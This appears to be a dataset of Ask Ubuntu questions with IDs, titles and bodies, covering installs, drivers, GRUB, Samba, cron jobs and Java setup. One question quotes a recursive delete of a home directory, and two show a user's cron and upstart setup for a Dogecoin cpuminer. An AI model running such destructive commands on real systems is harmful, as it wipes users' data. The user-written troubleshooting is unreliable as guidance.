libspeex-dev libtheora-dev libvorbis-dev libcairo2-doc libglib2.0-doc libgtk2.0-doc libpango1.0-doc libraw1394-doc libxcb-doc libmail-box-perl recommended packages : libraw1394-tools the following new packages will be installed : debhelper dh-apparmor gettext html2text intltool-debian libatk1.0-dev libavcodec-dev libavformat-dev libavutil-dev libcairo-script-interpreter2 libcairo2-dev libdc1394-22-dev libexpat1-dev libfontconfig1-dev libfreetype6-dev libgdk-pixbuf2.0-dev libgettextpo0 libglib2.0-dev libgtk2.0-dev libice-dev libilmbase-dev libmail-sendmail-perl libopencv-calib3d-dev libopencv-calib3d2.3 libopencv-contrib-dev libopencv-contrib2.3 libopencv-core-dev libopencv-core2.3 libopencv-dev libopencv-features2d-dev libopencv-features2d2.3 libopencv-flann-dev libopencv-flann2.3 libopencv-gpu-dev libopencv-gpu2.3 libopencv-highgui-dev libopencv-highgui2.3 libopencv-imgproc-dev libopencv-imgproc2.3 libopencv-legacy-dev libopencv-legacy2.3 libopencv-ml-dev libopencv-ml2.3 libopencv-objdetect-dev libopencv-objdetect2.3 libopencv-video-dev libopencv-video2.3 libopenexr-dev libpango1.0-dev libpcre3-dev libpcrecpp0 libpixman-1-dev libpng12-dev libpthread-stubs0 libpthread-stubs0-dev libraw1394-dev libsm-dev libswscale-dev libsys-hostname-long-perl libunistring0 libx11-dev libx11-doc libxau-dev libxcb-render0-dev libxcb-shm0-dev libxcb1-dev libxcomposite-dev libxcursor-dev libxdamage-dev libxdmcp-dev libxext-dev libxfixes-dev libxft-dev libxi-dev libxinerama-dev libxrandr-dev libxrender-dev po-debconf x11proto-composite-dev x11proto-core-dev x11proto-damage-dev x11proto-fixes-dev x11proto-input-dev x11proto-kb-dev x11proto-randr-dev x11proto-render-dev x11proto-xext-dev x11proto-xinerama-dev xorg-sgml-doctools xtrans-dev 0 upgraded , 90 newly installed , 0 to remove and 0 not upgraded . need to get 300 kb/32.4 mb of archives . after this operation , 135 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //archive.ubuntu.com/ubuntu/ precise-updates/main x11proto-core-dev all 7.0.22-1ubuntu0.1 connection failed [ ip : 91.189.91.13 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/x/x11proto-core/x11proto-core-dev_7.0.22-1ubuntu0.1_all.deb connection failed [ ip : 91.189.91.13 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? is there anything i can do to solve the error ?
393908	i am trying to make bootable usb stick from osx how ?	i am not trying to install it on my mac , i am trying to install it on a separate windows computer . how would i be able to make a usb stick from my mac plug into a computer and automatically load ubuntu ? thank you and have a nice day . dan
393909	not connecting to internet when switch from windos7 to ubuntu after a restart	ihave dual booted ubuntu 12.04 from wubi in window 7. now i am having a critical problem where i cant find any logic to it . when i switch from widows7 to ubuntu after a restart i found my internet connection is no more in ubuntu , now again i have to go to windows7 after restarting from ubuntu and found the net is completely ok in win7 , and just again restarting from windows7 to ubuntu it comes back with no problem whatsoever . what is it all about ? i have a lan netwok connection which comes directly to my lan port from the hub switch
393912	how to set https proxy in privoxy ?	how i can set a https proxy with authenication in privoxy ? like in proxifier .
393913	re-setting password on grub wont accept new passwords `` passwords do not match ''	so i have x2 netbooks for my twins birthdays . neither came with/people can remember the passwords . i know all the info about going into grub and i can get right up until inputting new unix ( sp ? ) password . i know the typed password does not come up on the screen . no matter what i try it always comes back at me saying passwords dont match . what the hell is going on here ? ? ? ? ? ? ? ? ? am i missing something ... how long does the password have to be . i have to get these up and running for xmas eve and am panicking now .
393919	how do i cast browser pages on my tv through dlna ?	i have a dell inspiron 6400 with ubuntu 12.04 , serviio 1.3.1 as a dlna server ( which works very well ) , samsung ue40c6510 . i would like to be able to cast what i see on my broswer ( full page of it ) on my tv screen without cables , just using my dlna server , is there a way ? thanks .
393920	does n't work automation autostart command for conky	i added conky configuration to my autostart application . but this does n't work after i restarted pc . here is how looks configuration at setting manager : here is content of .conkywizardlaunch file : sleep 8 & & conky -c ~/.conkywizardtheme/conkywizardtheme another linked file contains exactly conky configuration with looking themas . it should repaint view every 8 sec . unfortunately this does n't work at start . what is wrong here ? any suggestions ?
393922	ubuntu 12.04 is not working after update	i installed the ubuntu 12.04 updates , and when i restarted my desktop , it was all dark and said : ( the user ) -system-product-name login : how can i get it working ? i 'm not an expert , just an user
393926	how do i configure the package manager on server setup ?	i am trying to install ubuntu server 12.04 lts and there is a screen that comes up during the setup called `` configure the package manager '' : if you need to use a http proxy to access the outside world , enter the proxy information here . otherwise , leave this blank . the proxy information should be given in the standard form of `` http : // [ [ user ] @ [ : pass ] @ ] host [ : port ] / '' . http proxy information ( blank for none ) : i am not sure if `` i need to use a http proxy to access the outside world '' . how do i know ? edit i am planning to use nginx as proxy to jetty , does this setup refers to that ?
393927	new to linux . updating graphics drier help .	i just reinstalled ubuntu 12.04 ( lts ) 24 hours after i first installed it . i really screwed up the initial install when i tried to update the nvidia driver from 3.04 to 3.19 . ( i have an nvidia gt220 ) first time i installed the update from the icon in the top that said new updates were available . when the computer restarted it hanged on boot with a message : `` starting load fallback graphics devices fail '' . i tried a couple things i found on the ubuntu forums and the commands either did n't work or it completely messed up my install due to me just imputing any command i found online . so i ended up doing a complete reinstall . now i have the fresh install ... .i get the same pop-up about a driver update but i have n't touched it . do i click on the update ? download directly from nvidia ? or do it from the terminal ? a step-by-step would be much appreciated . also if i get the same error , how do i fix it ? please explain what i need to do , while i am familiar with the workings of dos/windows , i have no idea what i am doing in linux ( no idea what the xorg file is , how to change directories in the terminal or anything ) thanks ! ! ! ! ! ! !
393928	is there a pdf reader that displays animations ?	i 'm creating a presentation and need to include some animations . i placed the animation in the pdf file using beamer ( after storing the animation in a bunch of png files ) . now , when i open the file on okular or evince , i do n't see any animation . searching around , i read that evince does n't support animations but okular might support them . is this true ? is there any other tool you can use ?
393930	ca n't finish generating ssh key	i want to generate ssh key for github . i follow their documentation at generating ssh keys . i did all steps extends last : xclip -sel clip < ~/.ssh/id_rsa.pub copies the contents of the id_rsa.pub file to your clipboard here is my tries : nazar @ nazar-desctop : ~/.ssh $ ls -lag total 16 drwxr-xr-x 2 nazar 4096 dec 21 16:28 . drwxr-xr-x 39 nazar 4096 dec 21 16:17 .. -rw -- -- -- - 1 nazar 1766 dec 21 16:28 ssh-add id_rsa -rw-r -- r -- 1 nazar 404 dec 21 16:28 ssh-add id_rsa.pub nazar @ nazar-desctop : ~/.ssh $ xclip -sel clip < ~/.ssh/id_rsa.pub bash : /home/nazar/.ssh/id_rsa.pub : no such file or directory why does this happen ? how to solve this trouble ?
393936	broadcom b43 driver again : why modprobe b43 manually ?	i can see that this has been asked here several times before , but no one seems to have an answer or to be willing to give it , so i ask again . after reading through a dozens of tutorials , i finally managed to get my broadcom 4312 to work . but after every reboot , i have to do manually a $ sudo modprobe b43 then , after 20-30 secs , the wlan connection is etablished . what can i do to circumvent this ? i am running lubuntu 13.10 and have a 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1395 wlan mini-card [ 1028:000b ] flags : bus master , fast devsel , latency 0 , irq 17 memory at fe7fc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : b43-pci-bridge ( btw , why is the model number 4312 , but the subnumber in the brackets 4315 ? )
393937	which ubuntu should i choose	i am switching from windows to linux which is the best linux distro ? if i go for ubuntu which version should i go for , 12.04 , 13.04 or 13.10 ?
393941	how to diagnose when xrdp stops serving ?	i have been using xrdp to remotely login to my xubuntu desktop server . i use port forwaring using rdp port 3389 . last week we took the computer into fry 's to help with a fan noise . meanwhile the same day , we upgraded our upload/download speed through comcast . ever since we have plugged the computer back in , i have n't been able to log in to the server . i 've tried restarting xrdp , and when i check the status it seems like xrdp thinks it 's running with no problems . only thing is , i can not connect to the computer from outside , like i was able to before . when i try to access the computer with remote desktop , the initial connection fails and i ca n't even get the xrdp login screen . it seems like somehow my server stopped serving . can anyone help me diagnose this problem ? i have not been able to figure this one out . please let me know , thanks .
393942	personally identifiable information	will rm -rf /home/exampleuser/* remove all data including `` stored '' personal information that may still be on the system such as credit card numbers and passowrd etc . ?
393944	why nginx -v not display version on ubuntu12.04 ?	nginx was installed on our ubuntu 12.04 server and we want to find the version . here is what we did : admin @ ibm-testbox : /opt/nginx/sbin $ nginx -v the program 'nginx ' can be found in the following packages : * nginx-extras * nginx-full * nginx-light * nginx-naxsi try : sudo apt-get install < selected package > admin @ ibm-testbox : /opt/nginx/sbin $ nginx -v the program 'nginx ' can be found in the following packages : * nginx-extras * nginx-full * nginx-light * nginx-naxsi try : sudo apt-get install < selected package > then we were trying to find if nginx was running . here is the output : admin @ ibm-testbox : /opt/nginx/sbin $ ps waux | grep nginx root 7652 0.0 0.0 37560 1100 ? ss dec20 0:00 nginx : master process /opt/nginx/sbin/nginx nobody 7653 0.0 0.0 38008 2316 ? s dec20 0:00 nginx : worker process admin 23376 0.0 0.0 9388 924 pts/0 s+ 08:35 0:00 grep -- color=auto nginx the nginx was installed with phusionpassenger module . why nginx -v ( -v ) did not show version ?
393946	is there a `` live '' ubuntu version for android phone ?	i would like to know that if ubuntu can be installed on an android phone without wiping out the current installation . something like the live cd for desktops ?
393949	need help with init.d script	i am trying to run a wireshark capture as a daemon . i found this init.d script . http : //new.networkprotocolspecialists.com/downloads/tsharkd it works to start dumpcap , but when i try to use sudo /etc/init.d/tsharkd stop i get the following : /etc/init.d/tsharkd : 44 : /etc/init.d/tsharkd : stopping wireshark packet capture program : dumpcap : not found the script , tsharkd is has owner and group as root and permissions set as -rwxr-xr-x if i run the following line ( the stop command for the init.d script ) manually without sudo , i get the same error /sbin/start-stop-daemon -- stop -- signal 18 -- quiet -- user root -- group root -- exec /usr/bin/dumpcap > /dev/null & & result= '' running . '' & & exitval=0 if i run the line above with sudo it works . i have even tried editing visudo but still no luck . i also tried adding sudo to the line in the script . nothing seems to work .
393950	installing wine causes packages to be removed . is it safe ?	the terminal tells me the following after sudo apt-get install wine : the following packages will be removed : debhelper gettext intltool-debian po-debconf unity-lens-cooking just wanted to know if it is safe for the above packages to be removed ; and on a sidenote why the cooking lens causes a conflict . edit : i just found out this post is maybe a duplicate . so i can probably re誰nstall the removed packages once wine is installed . i 'm just not sure if they will conflict afterwards or not .
393952	disk partitioning issue	i am very new to linux ( ubuntu ) and to be hones this is the 6th . time i am re-installing ubuntu in a week as i always encounter one or the other issue with the installation . i would like to have a good suggestion on disk partitioning and other configuration to run it smoothly . i am using lenovo g570 laptop with 8gig of ram , intel® core™ i3-2350m cpu @ 2.30ghz × 4 , intel® sandybridge mobile . radeom graphics and 500 gigs of hd . i have downloaded ubuntu-12.04.3-desktop-amd64.iso and ready to put it to my pen driver to start re-installing . i am more concerned about the performance and stability .
393953	graphic drivers for asus n76vz ( nvidia geforce gt 650m )	i just installed the latest ubuntu 13.10 and i 'm trying to figure out what drivers i should install and how to do it . i have an integrated intel gpu and a nvidia geforce gt 650m that should work together according to the optimus technology . the software updater does n't show any additional third-party driver available , though , and this makes me think that maybe there are no drivers for linux 3.11 yet . so the question is : do i have to install additional drivers over the ones preinstalled by the system ? if yes , where can i find them ? thank you and please forgive the mistakes i could have done , but i 'm completely new to linux and i 'm trying to get started..
393954	can not access bios after shifting to legacy mode ( lenovo e330 )	i shifted windows 8 based laptop to boot in bios legacy mode just to be able to use a usb key with a 32 bits ubuntu saucy on it . worked fine . i tried an install on a fresh gpt partition and it worked fine . however ... now i can not access the bios anymore . the f1 or enter key ( that are supposed to lead me to bios setup , or to interrupt the standard boot respectively ) just ... do nothing . ubuntu ( 32 bits ) boots up immediately . is there any way to reenter the bios . i would like to do a clean uei based 64 bits install now or even access windows 8 . but i can not even turn back the boot to uefi mode : - ( several people seems to have the same issue and even clering the cmos ( by removing the internal rtc backup battery ) does not help . it just clears the rtc , the bios is using non volatile memory .
393958	ubuntu not loading !	i used unetbootin to load the ubuntu files on a usb stick . i plugged it in my computer and chose the option to load it off my usb . it loaded th files and then brought me to soething called busybox . it looks like a terminal . any help ? thanks and have a nice day ! -dan
393959	12.04.3 and super+w for all workspaces	problem : i can not get one feature working . how do i make super+w show open windows from all workspaces ? background : i installed ubuntu 12.04.3 64-bit freshly today and performed all updates . i appears to be the same problem as detailed in this post : how do i make super+w show open windows from all workspaces ? though my circumstances are different . the post regards 12.04.1 , and the post says that the compiz fix would be incorporated in 12.04.2 . i installed 12.04.3 this morning . my compiz version is 0.9.7.12 what i 've tried : i have tried using compiz-config-settings-manager ( ccsm ) and can verify that the keyboard short cut for super+w is correctly assigned to windows from all workspaces i attempted the workaround described at the linked post . a . add the ppa with sudo apt-add-repository ppa : bsantos/ppa . b . run sudo apt-get update . c. update compiz with sudo apt-get install compiz . in part 'c ' apt-get returns that compiz is fully up-to-date . and does not make any changes to the system . i can verify these results on two of my systems : - dell d620 ( ubuntu 32-bit ) - system76 lemur 4 ( ubuntu 64-bit ) i 'd really love to get this feature working and would appreciate any assistance .
393961	ubuntu 13.10 ( from cd ) does n't recognise my mouse	i just recently installed ubuntu 13.10 , after i had some problems running it from the usb i had it downloaded to originally ( when i rebooted the pc it went straight to windows ) . this was fixed with the boot repair disk recommended for this problem . anyway , with the cd and usb loaded into my computer it runs to the `` try ubuntu '' version you would expect but now , my problem is that it does n't let me use the curser from my mouse ( this is a laptop so usb connection ca n't be the problem ) . it look lets me use my keyboard without any issues but regardless lacking use of the mouse is still a problem . any advice is appreciated . thanks in advance .
393964	ok to have xp and ubuntu ?	with xp support ending in april 2014 it is worth creating a unbuntu dual partition or am i better off just replacing xp with ubuntu ?
393965	i just installed ubuntu restricted . how to use java ?	i just installed the ubuntu restricted extras . i want to code using java . how do i open the installed extras and use java . when i type `` java '' in dash home , i get many results . thank you .
393966	downgraded from windows 8 , and ca n't get ubuntu installed	i got a laptop with windows 8 pre-installed and i hated it . i installed ubuntu 12.04 on the entire disk as the only operating system and it worked fine , but i knew at some point i 'd need the windows back . anyways , i did n't want to go back to windows 8 , so i disabled the secure boot , enabled the legacy support , and installed windows 7 , but now i ca n't install ubuntu beside it . i tried ubuntu 12.04 and 13.10 , but when i try to boot the flashdrive it gives the following messages : error : invalid magic number error : you have to load kernel first any idea re : how to solve ?
393972	best way to share a usb drive in samba ( and report correct size ) ?	i have set up my samba and it 's working but it is reporting incorrect directory size which is causing me issues : first i have mounted my usb drive in fstab with this.. uuid=fc470676-09cb-41ff-af01-1fc6066da4dc /usbdrive ext4 defaults and then i added it to my samba with this in smb.conf : [ usbdrive ] comment = usbdrive path = /usbdrive/ valid users = me writable = yes this works fine and shows up on all my samba connections , however i can not move large files to it because mac + windows hosts say that there is not enough space in that directory . this is because samba is reporting my os partition size to them.. is there a better way to do this ? many thanks
393974	cron error : bad username	i 've basically re-written the terminal output instead of appending a series of edits to this question : root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # tail /var/log/syslog dec 21 11:35:01 doge cron [ 820 ] : ( *system*doge2 ) reload ( /etc/cron.d/doge2 ) dec 21 11:35:01 doge cron [ 820 ] : error : bad username ; while reading /etc/cron.d/doge2 dec 21 11:35:01 doge cron [ 820 ] : ( *system*doge2 ) error ( syntax error , this crontab file will be ignored ) dec 21 11:38:01 doge cron [ 820 ] : error : bad command ; while reading /etc/cron.d/doge3 dec 21 11:38:01 doge cron [ 820 ] : ( *system*doge3 ) error ( syntax error , this crontab file will be ignored ) dec 21 11:56:01 doge cron [ 820 ] : error : bad command ; while reading /etc/cron.d/doge4 dec 21 11:56:01 doge cron [ 820 ] : ( *system*doge4 ) error ( syntax error , this crontab file will be ignored ) dec 21 11:56:01 doge cron [ 820 ] : ( *system*doge ) reload ( /etc/cron.d/doge ) dec 21 11:56:01 doge cron [ 820 ] : error : bad command ; while reading /etc/cron.d/doge dec 21 11:56:01 doge cron [ 820 ] : ( *system*doge ) error ( syntax error , this crontab file will be ignored ) root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # cat doge * * * * * /home/digger/webxass root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # cat doge2 * * * * * /home/digger/cpuminer/minerd -o stratum+tcp : //doge.pool.webxass.de:3333 -o < user > . < worker > : < worker_password > root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # cat doge4 * * * * * /home/digger/webxass root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # cat /home/digger/webxass /home/digger/cpuminer/minerd -o stratum+tcp : //doge.pool.webxass.de:3333 -o < user > . < worker > : < worker_password > root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # /home/digger/cpuminer/minerd -o stratum+tcp : //doge.pool.webxass.de:3333 -o < user > . < worker > : < worker_password > [ 2013-12-21 11:57:09 ] 1 miner threads started , using 'scrypt ' algorithm . [ 2013-12-21 11:57:09 ] starting stratum on stratum+tcp : //doge.pool.webxass.de:3333 [ 2013-12-21 11:57:09 ] stratum detected new block [ 2013-12-21 11:57:11 ] thread 0 : 4104 hashes , 6.24 khash/s [ 2013-12-21 11:57:43 ] stratum detected new block [ 2013-12-21 11:57:43 ] thread 0 : 211512 hashes , 6.46 khash/s [ 2013-12-21 11:58:43 ] thread 0 : 387384 hashes , 6.47 khash/s [ 2013-12-21 11:58:48 ] stratum detected new block [ 2013-12-21 11:58:48 ] thread 0 : 32964 hashes , 6.47 khash/s ^c root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # cat /home/digger/webxass /home/digger/cpuminer/minerd -o stratum+tcp : //doge.pool.webxass.de:3333 -o < user > . < worker > : < worker_password > root @ doge : /etc/cron.d # root @ doge : /etc/cron.d # su digger digger @ doge : /etc/cron.d $ digger @ doge : /etc/cron.d $ /home/digger/webxass [ 2013-12-21 11:59:51 ] 1 miner threads started , using 'scrypt ' algorithm . [ 2013-12-21 11:59:51 ] starting stratum on stratum+tcp : //doge.pool.webxass.de:3333 [ 2013-12-21 11:59:51 ] stratum detected new block ^cdigger @ doge : /etc/cron.d $ there 's some sort of syntax error , but i do n't know what it is . i really do n't understand the `` bad username '' error , digger is a valid user . which username is bad ? the digger username in the system ?
393976	after reboot , nothing shows up : ubuntu installation	after passing through all the steps mentioned here . i see nothing but a black screen , even after i wait for more than 15 minutes , nothing shows up . help plz .
393983	ca n't install libreoffice of openoffice	two weeks ago i converted my windows machine to ubuntu . i made the mistake of deleting libreoffice to load openoffice which i have been using for years . openoffice appears to load correctly but is no where to be found . when i try to run the f the machine tries to fix libreoffice and i just run in circles . i have followed countless forum suggestions for fixing , cleaning , installing , deleting , reinstalling and although i am happy with ubuntu , i desperately need one office suite or another . i am desperate ! any thoughts beyond the first line obvious ? thanks .
393987	installing assault cube , how to	i downloaded assault cube from the website , and now i dont know how to install it . i 'm new to ubuntu . please help . i have the .tar.biz file and extracted it to downloads . i doubled clicked install.sh and nothing happened .
393989	combine two hard disks in lubuntu 13.10	i have two hdds and want to combine them to one , one had debian installed that is 51gb , and other one is ntfs with 30gb space . i want to combine the 20gb from debian hdd and want to to add to my 30 gb .
393990	vlc player does n't run with optirun	i have installed bumblebee . other applications are working with optirun instead of vlc . optirun -b primus vlc error vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0x19d0108 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . ../../../include/vlc_xlib.h:46 : vlc_xlib_init : xlib not initialized for threads . this process is probably using libvlc incorrectly . pass `` -- no-xlib '' to libvlc_new ( ) to fix this . [ 0x1d8e5e8 ] qt4 interface error : xlib not initialized for threads ../../../include/vlc_xlib.h:46 : vlc_xlib_init : xlib not initialized for threads . this process is probably using libvlc incorrectly . pass `` -- no-xlib '' to libvlc_new ( ) to fix this . [ 0x1d8e5e8 ] skins2 interface error : xlib not initialized for threads [ 0x1d8e5e8 ] skins2 interface error : initializing xlib for multi-threading failed [ 0x1d8e5e8 ] skins2 interface error : can not initialize osfactory [ 0x1d8e5e8 ] [ cli ] lua interface : listening on host `` *console '' . vlc media player 2.0.8 twoflower command line interface initialized . type `help ' for help system info ubuntu 13.10 ( 64bit ) optirun ( bumblebee ) 3.2.1 is there any workaround ? ? thanks..
393995	how to make totem play rmvb in ubuntu saucy 13.10 ?	how to make totem play rmvb in ubuntu saucy 13.10 ? i was in ubuntu 12.04 a couple days ago . and it works well on rmvb files with totem and when i upgraded the system to 13.10 , just found the totem does not play rmvb even after i installed the ubuntu-restricted-extras package . could some one help ? humm , i guess vlc is not the real answer i am looking for .
393996	how to remove alt+shift from hotkeys ?	after i has upgraded to ubuntu 13.10 , i encountered broken language swtich problem . after i installed the fix , i was able to switch using hotkey combination for : ho to next source '' ( which is super + space by default ) , but the original problem did not go away . by that i mean : alt _ shift still works ( changes language indicator ) and is still broken ( language is not actually switched from english ) . since i already have muscle memory for this key combination , i use it from time to time and am forced to waste seconds switching back normally using super + space . this is very annoying . what i would like to do is to remove old key combination , so that reflexive input of alt + shift wo n't do anything at all to language settings . but i can not find this combination among keyboard shortcuts in keyboard layout settings anymore . where is this setting located and how can i clear it away ?
393998	i ca n't see djvu thumbnails in xubuntu ( 13.10 )	so the problem is as follows : i downloaded a certain number of djvu books . when i open the location in thunar , no thumbnail is shown . `` show thumbnails '' option in desktop settings is enabled . pdf files are previewed correctly , and in /usr/share/evince-thumbnailer/ image/vnd.djvuexists as an option . i tried adding additional types of djvu mime codes to the thumbnailer desktop file but no work ! tried to manually run evince-thumbnailer $ i $ o on a file gave the correct output . i also tried to get the available arch extension which is alike the mentioned evice-thumbnailer command ( almost exact ) . if you need any additional information , i would like to solve this since on all 4 machines i use xfce .
393999	set opendns on ubuntu server 12.04.3	how can i set to use opendns on my ubuntu server ? i am virtualizing for improvement at home , so i do n't want to change router configuration etc.. i tried setting it on the file /etc/resolv.conf but every time i reboot my virtual server it overwrites my changes .
394001	make a new storage spot and install windows	my question is how to make a new storage spot and install windows 7 ( 64 bit ) . couse its a lot of games available for windows but not linux . p.s with gparted
394003	screen resolution not scaling properly during boot up	i have a problem that is rather annoying during the boot up of ubuntu 12.04.3 lts . i dual boot with windows 7 and when i get to the os selection bit , there is a nice fat black border around the edge of the screen where the resolution is not scaling properly . i have installed super boot manager and burg , which are running just fine and i also have correctly set the screen resolution to 1920x1080 . the resolution works fine and is being picked up correctly , it is just that it is not scaling properly at all , regardless of what resolution i pick . i am using a hp2311x monitor ( 1920x1080 native ) on a nvidia gtx660 and connected via a dvi cable . is there any possible way i can correctly scale my resolution , during the boot up process . what is worse is that it correctly scales during installation of the dvd rom . so why does it scale correctly off a dvd during install and completely fails once the os is installed correctly and all the drivers updated and working just fine .
394005	how to undo 'list only ' permission for folder ?	i accidentally set 'list only ' permission to a very important folder of mine with the intention of hiding it from my employees . but now , even i 'm unable to access it . the notification reads out '' you do not have the permissions necessary to view the contents of 'folder-name ' . '' i tried to change the permissions but it reads out again : '' permissions of 'folder-name ' could not be determined . '' how do i undo the 'list only ' permission now ? please help . its a very important folder for my business .
394010	inspiron 15 n5040 webcam has no color ?	i 'm running ubuntu 13.04 unity . i realize this might not be the right place , but i have dell inspiron 15 n5040 laptop and the web cam has no colors ( tested with three different programs ) . i suppose it could be a crappy webcam , but really ? no colors ? i 'm not able to test this on windows . is it possible i am missing some drivers ? this is the model on ubuntu page http : //www.ubuntu.com/certification/hardware/201104-7783/components/ thanks .
394012	what partioning format ?	hey everyone im whiping out ubuntu and going back to windows 7 . im currently formating my main partion of 120gb and im wondering what partion type it should be ? thanks i booted the windows installer and it said that it can not be installed on that drive , i deleted those partions made one big one and will try again
394017	installing unbuntu in win 7	i try to install unbuntu through bootable usb , i choose language , region , but when it was installing ( almost half ) screen disappear . i cut power after 5 hour and ... ... now i loose window operating system but i still want to install ubuntu . help me ( ps . i try from both cd and usb , same thing happen . once cd installing stuck in `` installing grub dummy '' and usb says ext.4 fail )
394019	how do i use upstart , instead of cron , to start a single instance of a job which should always respawn ?	how do i script the following bitcoin/dogecoin/etc cpuminer command : /home/digger/cpuminer/minerd -o stratum+tcp : //doge.pool.webxass.de:3333 -o < user > . < worker > : < worker_password > to execute in cron so that if , and only if , minerd is not running ? my current cron script * * * * * digger /home/digger/webxass results in way too many minerd processes : top - 12:32:00 up 4:55 , 3 users , load average : 17.45 , 13.71 , 7.98 tasks : 141 total , 2 running , 139 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 0.1 us , 0.1 sy , 72.7 ni , 27.1 id , 0.0 wa , 0.0 hi , 0.0 si , 0.0 st kib mem : 502268 total , 463344 used , 38924 free , 25200 buffers kib swap : 0 total , 0 used , 0 free , 325140 cached pid user pr ni virt res shr s % cpu % mem time+ command 14335 digger 20 0 374m 3540 2452 s 10.3 0.7 3:29.42 minerd 14344 digger 20 0 374m 3544 2452 s 10.3 0.7 2:29.48 minerd 14352 digger 20 0 374m 3540 2452 s 10.3 0.7 1:59.50 minerd 14527 digger 20 0 374m 3540 2452 s 10.3 0.7 0:39.83 minerd 14362 digger 20 0 374m 3540 2452 s 5.2 0.7 1:39.50 minerd 14373 digger 20 0 374m 3540 2452 s 5.2 0.7 1:24.51 minerd 14491 digger 20 0 374m 3540 2452 s 5.2 0.7 1:12.55 minerd 14500 digger 20 0 374m 3540 2452 s 5.2 0.7 1:02.55 minerd 14511 digger 20 0 374m 3540 2452 s 5.2 0.7 0:53.98 minerd 14519 digger 20 0 374m 3540 2452 s 5.2 0.7 0:46.49 minerd 14535 digger 20 0 374m 3540 2452 s 5.2 0.7 0:33.82 minerd 14544 digger 20 0 374m 3540 2452 s 5.2 0.7 0:28.38 minerd 14552 digger 20 0 374m 3536 2452 s 5.2 0.7 0:23.39 minerd 14560 digger 20 0 374m 3536 2452 s 5.2 0.7 0:18.78 minerd 14568 digger 20 0 374m 3536 2452 s 5.2 0.7 0:14.51 minerd 14576 digger 20 0 374m 3540 2452 s 5.2 0.7 0:10.51 minerd 14584 digger 20 0 374m 3540 2452 s 5.2 0.7 0:06.77 minerd 14592 digger 20 0 374m 3540 2452 s 5.2 0.7 0:03.25 minerd 1 root 20 0 26952 2644 1340 s 0.0 0.5 0:01.11 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/0 5 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/0:0h 7 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/0 root @ doge : ~ # killall minerd root @ doge : ~ # cd perhaps it 's just as efficient to run hundreds of little minerd processes , i do n't know , but i would rather just one or two . two probably makes more sense . see also http : //article.gmane.org/gmane.linux.ubuntu.user/271280
394022	is there a way to keep oracle 's jre/jdk as the default jre/jdk ?	okay here is my issue . every time i install a .deb installer of a program that requires java . openjdk hijacks my system and sets it as default java . i do n't want to use openjdk , if i did i would n't be asking this question whenever i install a .deb package however , it installs openjdk and sets it as the default jdk . which means when i have to use programs that do n't work very well with openjdk i have to sudo apt-get purge openjdk* then run the oracle jdk .deb package to reinstall it . i do n't want to have to do this , or switch from openjdk to oracle 's official jdk . it is time wasting . is there anyway to stop openjdk from hijacking my system and setting itself to the default jdk ? note : i call it hijacking , because it is replacing the jdk i installed with a .deb created with alien from the official jdk rpm . i do n't want to use it , it does n't ask me if it can be installed and be used as the default jdk/jre .
394023	is there a way for me to install ubuntu without a flash drive or cd ( not using windows )	i have fedora 19 running on my laptop and i want to switch to ubuntu , but i do n't have a flash drive or external hard drive . is there some way i can install ubuntu from inside fedora then boot ubuntu and get rid of fedora on my computer ?
394024	how to edit the grub file	the backlight of my acer aspire 5336 screen turns off when ubuntu 12.04 is installed . i found that it could be corrected by editing the grub file screen turns black after booting , backlight only works in recovery mode on an acer aspire 5736z but since i can not do so via ubuntu ( as the backlight is turned off ) how can i edit the grub file ? thank you
394027	can i have one os using legacy ( windows 7 ) and one os using uefi ( ubuntu )	i want to dual boot windows and ubuntu . i was wondering if i installed ubuntu in uefi and windows in legacy if i could avoid the grub menu and just switch bios settings when the other os was needed .
394033	ubuntu/xubuntu failed install via usb or dvd	trying to build a small rig sans hdd . spent last two days trying to load either xubuntu or ubuntu 13.x via usb to no avail , used lili , unetbootin , and pendrive , to create usb bootable files . using a 16g pen drive to install to a 16g pen drive as hdd . now trying to install via burned dvd . all attempts end almost immediately at initial screen with `` spreadsheet = person in circle '' logo . then nothing . do n't understand , please help . amd athlon ii x2 asus m4a785-m 4g ddr2 ram
394037	error : while executing gem ( some : :gem ) no such name ( http : //some.url )	i 'm trying to install rails using $ sudo gem install rails but i get this error : error : while executing gem ... ( gem : :remotefetcher : :unknownhosterror ) no such name ( https : //rubygems.org/quick/marshal.4.8/activerecord-4.0.2.gemspec.rz what am i doing wrong ? do i have to use sudo apt-get install rails instead ? i have in my system $ ruby -v > 2.1.11 $ gem -v > ruby 1.9.3p0 ( 2011-10-30 revision 33570 ) [ i686-linux ] i 'm following these instructions solved how did i solved it ? i followed this as mitch advised me , but after sudo apt-get install ruby1.9.3 i got that ruby -v showed ruby 1.8.7 so i did this and then i continue with sudo gem install rails it worked .
